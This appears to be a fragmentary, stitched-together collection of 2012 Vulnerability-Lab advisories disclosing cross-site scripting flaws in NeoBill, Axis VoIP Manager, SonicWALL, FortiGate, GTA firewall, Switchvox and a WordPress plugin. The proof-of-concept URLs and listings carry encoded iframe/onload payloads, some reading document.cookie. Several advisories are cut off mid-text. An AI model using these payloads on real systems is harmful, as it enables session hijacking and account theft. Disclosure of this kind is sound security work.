neobill.127.0.0.1:1339/neobill/manager/manager_content.php
?page=services_serverssubmit=search_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C

Register Domain:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php
?page=domains_registersubmit=register_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C


New Domain Service:
neobill.127.0.0.1:1339/neobill/manager/manager_content.php
?page=services_new_domain_servicesubmit=new_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C


Risk:
=
1.1
The security risk of the persistent input validation vulnerability is estimated 
as high.

1.2
The security risk of the non persistent cross site scripting vulnerabilities 
are estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities

Title:
==
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities


Date:
=
2012-09-09


References:
===
http://www.vulnerability-lab.com/get_content.php?id=686


VL-ID:
=
686


Common Vulnerability Scoring System:

2.3


Introduction:
=
Feel free to create Schedules (in PBX Features), Inbound Routes,  User 
Extensions (individually or using 
Bulk Generator in Extensions  Directory), Feature Dial Codes (in PBX Features 
- Feature Dial Codes), 
IVR Menus (in PBX Features), ACD Queues, etc.

(Copy of the Vendor Homepage: http://www.axint.net/voip/ )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple cross site 
scripting vulnerabilities in the Axis VoIP Manager v2.1.5.7.


Report-Timeline:

2011-09-07: Public Disclosure


Status:

Unpublished


Affected Products:
==
Axis
Product: VoIP Manager v2.1.5.7


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple non persistent cross site scripting vulnerabilities are detected in 
the Axis VoIP Manager User Portal v2.1.5.7.
The vulnerability allows an attackers (remote) to hijack website customer, 
moderator or admin sessions with medium or high 
required user inter action. The bugs are located on client side in the 
contact_chooser.cgi and contacts.cgi files with the 
bound vulnerable lastname, firstname, department, contact or manageg_usr 
application parameters.  Successful exploitation 
result in application account steal, client side phishing  client-side content 
request manipulation. Exploitation requires 
medium or high user inter action  without privileged web application user 
account.

Vulnerable Module(s):
[+] contact_chooser.cgi
[+] contacts.cgi

Vulnerable Parameter(s):
[+] lastname, firstname  department
[+] contact
[+] managed_usr


Proof of Concept:
=
The client side cross site scripting vulnerabilities can be exploited by remote 
attackers with medium or high required 
user inter action and without privileged application user account. For 
demonstration or reproduce ...

Selection Filter

https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2lastname=lastname_match=1firstname=
firstname_match=1department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Cdepartment_match=1action=Select


https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2lastname=
lastname_match=1firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Cfirstname_match=
1department=department_match=1action=Select

https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2;
lastname=
%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Clastname_match=1firstname=firstname_match=
1department=department_match=1action=Select


Contact Chooser

https://voip01.127.0.0.1:5999/asterisk/contact_chooser.cgi?contact=%22%3E
%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C


managed_usr - listing

https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?type=2usr=demo-100managed_usr=%22%3E%3Ciframe%20src=
a%20onload=alert%28%22HI%22%29%20%3Ctype_selector=2lastname=lastname_match=1firstname=
firstname_match=1department=department_match=1action=Select+


Risk:
=
The security risk of the non persistent (client side) cross site scripting 
vulnerabilities are estimated as low(+)|(-)medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com

SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities

=safeModeNoOfQuarantine size=3 
value=iframe src=a 
[EXECUTE/INJECT PERSISTENT CODE!])  
id=safeModeNoOfQuarantine

... or

input type=text 
name=safeModeNoOfMessageFromOneUser size=3 
value=iframe src=a 
[EXECUTE/INJECT PERSISTENT CODE!])  
id=safeModeNoOfMessageFromOneUser


URL:http://esserver.127.0.0.1:8080/virus_config.html




PoC: Compliance Module  - Approval Ordner - Listing  Exceptions

tbodytrtd 
background=policy_approval_box_summary-Dateien/nav_bar_background.gif 
width=24
img src=policy_approval_box_summary-Dateien/clear.gif height=15 
width=4/tdtd border=0 
background=policy_approval_box_summary-Dateien/nav_bar_background.gifspan 
class=columnApproval-
Ordner/span/tdtd border=0 
background=policy_approval_box_summary-Dateien/nav_bar_background.gif
span class=columnNachrichten, die eine Genehmigung erfordern/span/tdtd 
background=policy_approval_box_
summary-Dateien/nav_bar_background.gif /td/trtr
td height=12 /td
tda href=http://esserver.demo.sonicwall.com/policy_approval_box.html
?pathname=[INJECTED PERSISTENT CODE!]iframe src=policy_approval_box_
summary-Dateien/a.htm [EXECUTION OF PERSISTENT CODE!] = a=/td
td0/td
tddiv
 align=rightinput type=button name=delete class=button 
value=Löschen 


URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html



1.2
The client side cross site scripting vulnerability can be exploited by remote 
attackers with medium required user inter action.
For demonstration or reproduce ...

PoC:

http://esserver.127.0.0.1:8080/alert_history.html?from=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/alert_history.html[POST 
REQUEST]row=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c
http://esserver.127.0.0.1:8080/policy_approval_box.html?pathname=%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c


Solution:
=
The Email Security 7.3.6 patch that addresses this set of issues has now been 
posted and is available to all of our Email Security customers 
from the download section of our customer portal 
(https://www.mysonicwall.com/Firmware/DownloadCenter.aspx). 


Risk:
=
1.1
The security risk of the persistent input validation vulnerabilities are 
estimated as high(-).

1.2
The security risk of the client side cross site scripting vulnerabilities are 
estimated as low(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com

Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

Title:
==
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities


Date:
=
2012-09-06


References:
===
http://www.vulnerability-lab.com/get_content.php?id=557


VL-ID:
=
557


Common Vulnerability Scoring System:

5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Since 2009 Fortigate appliance series got certified by the U.S. Army and is now 
listed in the 
Information Assurance Approved Products List (IA APL). The military provides 
high security 
standards to secure outdoor camps, air base, offices with fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
Vulnerability-Lab Research Team discovered multiple persistent Web 
Vulnerabilities in the FortiGate UTM Appliance Application.


Report-Timeline:

2012-05-06: Researcher Notification  Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537  Fixed in 
FortiOS v5.0  )
2012-09-06: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
High


Details:

Multiple input validation vulnerabilities(persistent) are detected in the 
FortiGate UTM Appliance Application. Remote attackers 
 low privileged user accounts can inject (persistent) own malicious script 
code to manipulate specific customer/admin requests. 
The vulnerability allows an local low privileged attacker to  manipulate the 
appliance(application) via persistent script code 
inject. The vulnerability is locaed in the Add or Tags module category listing 
with the bound vulnerable applied tags  tags display parameters.
Successful exploitation results in content module request manipulation, 
execution of persistent malicious script code, session 
hijacking, account steal  persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags 
[+] Add - Tags Display


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B
FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B
 Series


Proof of Concept:
=
The persistent vulnerabilities can be exploited by remote attackers with low 
required user inter action or low 
privileged user account. For demonstration or reproduce  ...


Code Review:Tags - Applied tags [Box]  Listing
URL:
http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if 
(!fwad_form_check('Please choose one address/group.',
'Please choose one interface to connect.')) return false; if 
(document.forms[0].submitFlag) return false; document.forms[0].
submitFlag = true;``
tabletbodytr
td align=``left`` width=``150``nobrAddress Name/nobr/td
td align=``left``input 
name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text``
/td
/tr
tr
tdColor/td
tdspan colorclassprefix=``addr_ipv6_
`` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` 
id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` 
name=``csColor1`` type

Fortigate UTM WAF Appliance - Cross Site Vulnerabilities

Title:
==
Fortigate UTM WAF Appliance - Cross Site Vulnerabilities


Date:
=
2012-09-07


References:
===
http://www.vulnerability-lab.com/get_content.php?id=559


VL-ID:
=
559


Common Vulnerability Scoring System:

3.5


Introduction:
=
The FortiGate series of multi-threat security systems detect and eliminate the 
most damaging, content-based threats from email 
and Web traffic such as viruses, worms, intrusions, inappropriate Web content 
and more in real time - without degrading 
network performance.

Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 
series for large enterprises, service providers and 
carriers, the FortiGate line combines the FortiOS™ security operating system 
with FortiASIC processors and other hardware to provide 
a comprehensive and high-performance array of security and networking functions 
including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against 
network, content, and application-level threats - including 
complex attacks favored by cybercriminals - without degrading network 
availability and uptime. FortiGate platforms incorporate sophisticated 
networking features, such as high availability (active/active, active/passive) 
for maximum network uptime, and virtual domain (VDOM) 
capabilities to separate various networks requiring different security policies.

Fortigate applainces are Pentagon  US Military certified. 
The military provides high security standards  save outdoor camps, air base, 
offices with fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )


Abstract:
=
Vulnerability-Lab Research Team discovered multiple non-persistent Web 
Vulnerabilities in the FortiGates UTM Appliance Application.


Report-Timeline:

2012-05-07: Researcher Notification  Coordination
2012-05-10: Vendor Notification
2012-06-08: Vendor Response/Feedback
2012-08-30: Vendor Fix/Patch ( FortiOS v4.3.8 B0630  FortiOS v5.0 B064 )
2012-09-07: Public or Non-Public Disclosure


Status:

Published


Affected Products:
==
Fortigate
Product: UTM Firewall Appliance Application vFortiGate-5000 
Series;FortiGate-3950 Series;FortiGate-3810A;


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple input validation vulnerabilities (non-persistent) are detected in the 
FortiGates UTM Appliance Application. 
The vulnerability allows remote attackers to hijack admin/customer sessions 
with required user inter action (client-side). 
Successful exploitation allows to phish user accounts, hijacking sessions, 
redirect over client side requests or manipulate 
website context on client-side browser requests.


Vulnerable Module(s): (Non-Persistent)
[+] Exception Handling - 
objusagedlg
[+] WiFi-controller SSID - Topic
[+] Display Message - Title  
Message

Picture(s):
../1.png
../2.png


Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series;FortiGate-3950 
Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B
FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B
 Series


Proof of Concept:
=
The non-persistent vulnerability can be exploited by remote attackers with 
medium or high required user inter action. 
For demonstration or reproduce  ...


Code Review:Exception Handling - objusagedlg
URL:http://appliance.127.0.0.1:137/objusagedlg?type=220mkey=

div style=text-align: center;h2WiFi-controller SSID span 
class=emphasized_msg[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!] 
/span is used by:/h2divTotal References: span 
id=total_refcount/span/divdiv class=info_msgspan id=total_unused
/span object types that may be configured to use this object have no 
references (span id=unused_toggle/span)/div
form name=search_paramsinput name=type value=220 type=hiddeninput 
name=mkey value= type=hidden
iframe src=objusagedlg-Dateien/hack.htm [EXECUTES NON-PERSISTENT SCRIPTCODE 
HERE!]' =input
 type=hidden name=mkey_display value= //formdiv 
id=reftable-container/div


Code Review:Display Message - Title  Message
URL:
https://appliance.127.0.0.1:137/displaymessage?url=/webfilter/profile/dlgtitle=

td[EXECUTES NON-PERSISTENT SCRIPTCODE HERE!]' = td=
/tr
/table/td
/tr
tr
td class

GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities

=secret_hidden name=secret_hidden value= type=hiddeninput 
id=allowGenCert name=allowGenCert 
value=1 type=hiddeninput id=remotePW_hidden name=remotePW_hidden 
value= type=hidden
iframe src=user-list_data/[PERSISTENT SCRIPT CODE!]' =/td/tr
tr
td

...  identity

class=forminput id=identity 
name=identity type=text size=60 maxlength=127 
value=iframe src=[PERSISTENT SCRIPT CODE!]
#34;)  
/ /td
/tr

...  fullName

td colspan=3input class=forminput id=fullName 
name=fullName type=text size=60 maxlength=59 
value=iframe src=a 
[PERSISTENT SCRIPT CODE!])  
/ /td
/tr
tr

...  desc

td colspan=3input class=forminput id=desc name=desc 
type=text size=60 maxlength=79 
value=iframe src=a 
#34;[PERSISTENT SCRIPT CODE!])  
/ /td
/tr


... or the secret_hidden

input id=strength name=strength value=95 type=hiddeninput 
id=secret_hidden 
name=secret_hidden value= type=hidden[PERSISTENT SCRIPT CODE!])' 
=input 
id=allowGenCert name=allowGenCert type=hidden value=1 /


URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3





Review: VPN Certificate - Details Listing

tr
td class=formlabelSubject:/td
tdemailAddress = \[PERSISTENT SCRIPT CODE!]) , 
CN = \[PERSISTENT SCRIPT CODE!]) , O = 
[PERSISTENT SCRIPT CODE!] , L = 
[PERSISTENT SCRIPT CODE!]) , ST = 
[PERSISTENT SCRIPT CODE!]) , C = US, OU = 
i[PERSISTENT SCRIPT CODE!])  /td
/tr

Note: The vulnerable content certificate can also be exported via download 
function to review the problem.

URL: http://gta.127.0.0.1/config/vpn/certs/certs-fs_en_6.0.3


Solution:
=
Parse the input field values secret_hidden, remotePW_hidden, identity, form 
input desc, fullName  emailAddress. 
Restrict the name input fields  with a special filter when processing to load 
strings with tags like (  , double quotes  co.  ...). 
Parse also the vulnerable output listing were the script code is getting 
unsanitized executed out of the waf application context.


Risk:
=
The vulnerabilities can be exploited with low required user inter action  
privileged user account.
The security risk of the persistent input validation vulnerabilities are 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team  the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: ad...@vulnerability-lab.com

Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities

 the poc press on test CRM Settings
3- Setup - Groups - Create Extension Group [Note]
4- Setup - Outgoing calls - Create Outgoing Call rule [Note]
5- Setup - Incoming Calls - Caller DID routes - Create Single DID Route 
[Note]
6- Setup - Incoming Calls - Caller ID Rules - Create Call transfer Call 
[Note]


1.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=modify_soundsound_id=478


div class=desc_divbDescription:/b Your new password must be different 
than your old password. 
Please try again.br[PERSISTENT INJECTED SCRIPT CODE!]br/[PERSISTENT 
INJECTED SCRIPT CODE!])/ifram/iframe/div



2.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?plugin_name=sugarcrmadmin_sbplugins_id=1cmd=modify_crm_pluginsugarcrm=1


[1101],plugin_type:system,plugin_description:Lookup up and display 
contact information straight from your SugarCRM 
server.,plugin_display:SugarCRM,plugin_name:sugarcrm,admin_sbplugins_id:1,proxy:http://\[PERSISTENT
 INJECTED SCRIPT CODE!])
/iframe,uri:http://\[PERSISTENT INJECTED SCRIPT CODE!])


3.
URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=extension_groups


div style=margin-right: 5px; display: none;div style=width: 400px; 
class=pwm_container_paddingdiv[PERSISTENT INJECTED SCRIPT CODE!])
/iframe'[PERSISTENT INJECTED SCRIPT CODE!])/iframe[PERSISTENT 
INJECTED SCRIPT CODE!])
/iframe'/iframe/divdiv class=clear/div/div/div/div
div style=display: none; class=pwm_top_arrow/divdiv style=left: 
187px; top: 354px; class=pwm_bottom_arrow/div


4.
URL: https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=add_outgoing_rule


{call_through:{internal:{}},priority:9,name:test,description:\[PERSISTENT
 INJECTED SCRIPT CODE!])/iframe \
[PERSISTENT INJECTED SCRIPT 
CODE!],failovers:{},is_final:0,pattern:Begins with 13 and the 
remainder is 23 to 90 digits in 
length,id:103,context_type:USER}],total_items:9}},allExtensions:


5.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rulespassthrough=1#pageTab=did_routes

code 

number:123,name:test,note:\[PERSISTENT INJECTED SCRIPT 
CODE!])/iframe,force_fax:0,any_provider:1,type:route_number,id:3,call_type:0},
{priority:2,action:busy,type:catchall_unknown_route,id:1}],total_items:3}},switchvox_version:40062,
menu_structure:[{children:[{children:[{cmd:view_extensions,id:manage_extensions,display:Manage},{cmd:extension_groups,id:extension_groups,display:Groups},{cmd:extension_templates,id:extension_templates,display:Templates},
{cmd:extension_permissions,id:extension_permissions,display:Permissions},{cmd:phone_setup,id:extension_phones,display:Phones},
{cmd:extension_settings,id:extension_settings,display:Settings}],id:extensions,column:1,display:Extensions},{children:
[{cmd:channel_groups,id:channel_groups,display:Channel 
Groups},{cmd:voip_providers,id:voip_providers,display:VOIP 
Providers},
{cmd:outgoing_rules,id:outgoing_calls,display:Outgoing Calls},


6.
URL: 
https://asterisk-switchvox.127.0.0.1:1337/admin?cmd=incoming_rules#pageTab=caller_id_rules


Risk:
=
The security risk of the  persistent input validation vulnerabilities are 
estimated as medium(+).



Credits:

Vulnerability Laboratory [Research Team]  -Ibrahim M. El-Sayed [the StOrM) 
(st...@vulnerability-lab.com) [http://iel-sayed.blogspot.com]



Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form

Better WP Security v3.4.3 Wordpress - Web Vulnerabilities

Title:
==
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities


Date:
=
2012-08-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=691


VL-ID:
=
691


Common Vulnerability Scoring System:

3.5


Introduction:
=
plugin thereby ensuring that as many security holes as possible are patched 
without having to worry about 
conflicting features or the possibility of missing anything on your site. With 
one-click activation for most 
features as well as advanced features for experienced users Better WP Security 
can help protect any site.

(Copy of the Vendor Homepage: 
http://wordpress.org/extend/plugins/better-wp-security/  )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple persistent web 
vulnerabilities in the Better WP security v3.4.3 Wordpress Application Addon.


Report-Timeline:

2012-08-21: Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the Better 
WP security v3.4.3 Wordpress Application Addon.
The vulnerability allows remote attackers to hijack website customer, moderator 
or admin sessions with medium or high required user inter 
action. The bugs are located on server side in the Limit Login Attempts, 
Exception Handling Error  Intrusion Detection module with the 
bound vulnerable email address  error parameter. Successful exploitation can 
result in wordpress application account steal, client side 
phishing  client-side content request manipulation. Exploitation requires 
medium or high user inter action  without privileged 
web application user account.

Vulnerable Module(s):
[+] Better WP Security - Limit Login Attempts  
Intrusion Detection
[+] Exception Handling Error

Vulnerable Parameter(s):
[+] Email Address
[+] Error


Proof of Concept:
=
The persistent vulnerability can be exploited by remote attackers with low 
required user inter action  low privileged 
application user account. For demonstration or reproduce ...

Inject the following example string to the application input (persistent) or 
parameter (client side)
String:  iframe src=http://www.vulnerability-lab.com/iframe


Review: Listings

tr valign=top
th scope=row class=settinglabel
label for= ll_emailaddress=Email Address/label
/th
td class=settingfield
input id=ll_emailaddress name=ll_emailaddress value=\ type=text
[PERSISTENT INJECTED SCRIPT CODE!])' = ad...@vulnerability-lab.com=


Review: Exception Handling

div class=error style=text-align: center;p style=color: red; font-size: 
14px; font-weight: 
bold;Attention !/pp
Please add this site now to your a target=_blank 
href=http://managewp.com/wp-admin;ManageWP.com/a account.  
Or deactivate the Worker plugin to avoid a target=_blank 
href=http://managewp.com/user-guide/security;security issues/a. 
/p/divdiv id=message class=errorpLogin time period needs to be aan 
integer greater than 0./p/div
div id=message class=errorp\[PERSISTENT INJECTED SCRIPT CODE!])' 
= is= 
not= a= valid= ip.= p=/div


Solution:
=
The vulnerabilities can be patched by parsing the email address  error 
exception handling parameters and output listing.


Risk:
=
The security risk of the persistent input validation vulnerabilities are 
estimated as medium.


Credits:

Vulnerability Laboratory [Research Team]  -Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
